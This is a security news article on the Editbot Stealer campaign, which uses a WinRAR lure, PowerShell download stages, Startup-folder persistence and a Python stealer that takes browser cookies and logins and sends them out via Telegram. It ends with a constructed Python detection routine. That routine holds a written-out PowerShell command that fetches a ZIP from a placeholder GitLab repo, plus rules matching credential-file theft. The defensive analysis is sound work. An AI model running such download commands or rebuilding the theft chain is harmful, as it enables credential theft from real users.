New Editbot Stealer in Action; Stealing Browser Passwords & Cookies
A brand new malicious campaign, Editbot Stealer, was discovered in which threat actors use WinRAR archive files with minimal detection to launch a multi-stage attack. The threat actors used the theme of a "defective product to be sent back" to lure users to their fake websites.
The malicious WinRAR archive used by the threat actors contains a .bat file and a JSON file for the initial stage of the attack, followed by several PowerShell commands for the later stages. These malicious files were distributed via social media.
Editbot Stealer in Action
Initial Access & Persistence
According to the reports shared with Cyber Security News, the BAT file used in the initial stage of the attack goes by the name "Screenshot Product Photo Sample.bat" and contains a few PowerShell commands for downloading and executing additional payloads.
The first PowerShell command in the BAT file downloads another BAT file from GitLab and saves it under the name "WindowsSecure.bat" in the Startup folder for persistent execution. This BAT file is used to run the Python stealer, which is downloaded in a later stage of the attack.
The second PowerShell command retrieves a ZIP file named "File.zip" from the same GitLab repository and saves it in the C:\Users\Public directory. The third PowerShell command extracts this ZIP file into the C:\Users\Public\Documents directory, which then contains the Python stealer "libb1.py".
Working of the Python Stealer – Editbot
The Python stealer contains sophisticated code that performs various functions, including extracting the victim's country code, IP address, and timestamp, along with credential-stealing actions targeting various browsers.
The stealer extracts several pieces of data, such as cookies, login data, web data, and Local State, from the browser profile folder and stores them in the %temp% folder. All of the stolen data is saved in a text file named "budge.txt".
After collecting all of the data from the victim, the stealer creates a ZIP archive of the extracted data and stores it in the same %temp% directory. To exfiltrate this data, the threat actors have set up Telegram bots.
Furthermore, a complete report on the Editbot stealer has been published, which provides detailed information on the source code, the extraction method, and other details.
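As an added example, not taken from the article or from the report it cites, the following Python routine runs simple detection rules over constructed Sysmon-style events for the stages described above: a PowerShell download from GitLab into C:\Users\Public, a .bat written to the Startup folder, a Python script launched from C:\Users\Public\Documents, and browser database files appearing in %temp%. The GitLab repository path, the exact command-line form, and the assumption that the stealer keeps the browser file names when copying them to %temp% are all assumptions of this example.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Constructed Sysmon-style events (not real telemetry). The GitLab repo path is a placeholder,
# and the Temp file name assumes the stealer preserves the browser's own file names.
SAMPLE_EVENTS: List[Event] = [
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -c Invoke-WebRequest https://gitlab.com/PLACEHOLDER-repo/File.zip "
                r"-OutFile C:\Users\Public\File.zip", "target": ""},
    {"type": "FileCreate", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "", "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu"
                              r"\Programs\Startup\WindowsSecure.bat"},
    {"type": "ProcessCreate", "image": r"C:\Python311\python.exe",
     "cmdline": r"C:\Python311\python.exe C:\Users\Public\Documents\libb1.py", "target": ""},
    {"type": "FileCreate", "image": r"C:\Python311\python.exe", "cmdline": "",
     "target": r"C:\Users\alice\AppData\Local\Temp\Login Data"},
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\notepad.exe",  # benign control event
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt", "target": ""},
]

# One rule per stage of the chain: (rule name, event type, field inspected, case-insensitive regex).
RULES: List[Tuple[str, str, str, str]] = [
    ("powershell_gitlab_download_to_public", "ProcessCreate", "cmdline",
     r"powershell.*https?://gitlab\.com/.*c:\\users\\public\\"),
    ("bat_dropped_in_startup_folder", "FileCreate", "target", r"\\startup\\[^\\]+\.bat$"),
    ("python_script_run_from_public_documents", "ProcessCreate", "cmdline",
     r"python(\.exe)?\s+c:\\users\\public\\documents\\\S+\.py"),
    ("browser_artifact_copied_to_temp", "FileCreate", "target",
     r"\\temp\\(cookies|login data|web data|local state)$"),
]


def evaluate(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every event that matches a rule."""
    hits: List[Tuple[int, str]] = []
    for idx, ev in enumerate(events):
        for name, etype, field, pattern in RULES:
            if ev["type"] == etype and re.search(pattern, ev.get(field, ""), re.IGNORECASE):
                hits.append((idx, name))
    return hits


def chain_alert(events: List[Event], min_stages: int = 3) -> bool:
    """Raise an alert when at least min_stages distinct stages of the chain appear in the window."""
    return len({name for _, name in evaluate(events)}) >= min_stages


if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
    print("chain alert:", chain_alert(SAMPLE_EVENTS))
```

Any single rule can fire on benign administration; requiring several distinct stages within one host's event window is what keeps the alert specific to this chain.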
Indicators of Compromise
Source credit: cybersecuritynews.com